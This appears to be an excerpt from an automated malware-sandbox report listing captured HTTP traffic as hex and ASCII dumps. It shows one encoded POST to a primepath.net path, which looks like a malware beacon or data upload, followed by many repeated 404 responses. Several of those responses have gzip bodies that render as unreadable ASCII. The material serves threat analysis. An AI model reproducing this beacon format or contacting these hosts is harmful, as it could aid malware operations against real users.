Source: unknown; HTTP traffic detected: POST /esw3/ HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Cache-Control: max-age=0 | Content-Length: 203 | Connection: close | Content-Type: application/x-www-form-urlencoded | Host: www.primepath.net | Origin: http://www.primepath.net | Referer: http://www.primepath.net/esw3/ | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36 | Data Raw: 2d 6e 3d 66 52 67 6e 4e 56 4e 53 56 54 69 4d 64 58 4b 48 68 57 4e 41 70 46 70 46 34 4d 68 39 48 55 37 63 38 4c 4c 48 34 71 62 2b 58 50 43 62 49 51 33 6a 77 52 6c 77 4f 47 6f 77 71 75 50 36 79 53 4a 38 73 34 68 53 62 58 63 4a 4a 4b 65 51 67 36 73 48 43 6a 75 46 51 31 56 46 4a 48 59 79 4c 4e 56 61 47 56 56 64 67 4f 75 4c 68 53 45 63 4b 52 71 52 56 7a 50 54 33 55 57 31 35 30 61 35 67 52 65 39 4b 71 68 47 61 33 57 35 4c 71 56 77 30 37 2b 6d 65 32 70 39 48 45 30 32 6b 62 34 33 42 35 2f 32 7a 54 50 42 6c 4c 5a 50 44 6e 32 34 47 2b 47 37 56 68 33 72 59 63 4f 6b 32 70 50 49 6e 61 75 62 73 71 78 76 36 4c 63 3d | Data Ascii: -n=fRgnNVNSVTiMdXKHhWNApFpF4Mh9HU7c8LLH4qb+XPCbIQ3jwRlwOGowquP6ySJ8s4hSbXcJJKeQg6sHCjuFQ1VFJHYyLNVaGVVdgOuLhSEcKRqRVzPT3UW150a5gRe9KqhGa3W5LqVw07+me2p9HE02kb43B5/2zTPBlLZPDn24G+G7Vh3rYcOk2pPInaubsqxv6Lc=
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 03 Mar 2025 07:46:11 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 265 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 6f 6e 65 72 76 65 72 73 65 2e 61 70 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.loonerverse.app Port 80</address></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/8.2.27 | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | content-type: text/html; charset=UTF-8 | link: <https://primepath.net/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Mon, 03 Mar 2025 07:46:27 GMT | server: LiteSpeed | Data Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc | Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 03 Mar 2025 07:46:30 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 
b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 03 Mar 2025 07:46:32 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 
b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:46:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:46:43 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:46:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:46:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 03 Mar 2025 07:47:38 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 03 Mar 2025 07:47:40 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 03 Mar 2025 07:47:43 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:47:51 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 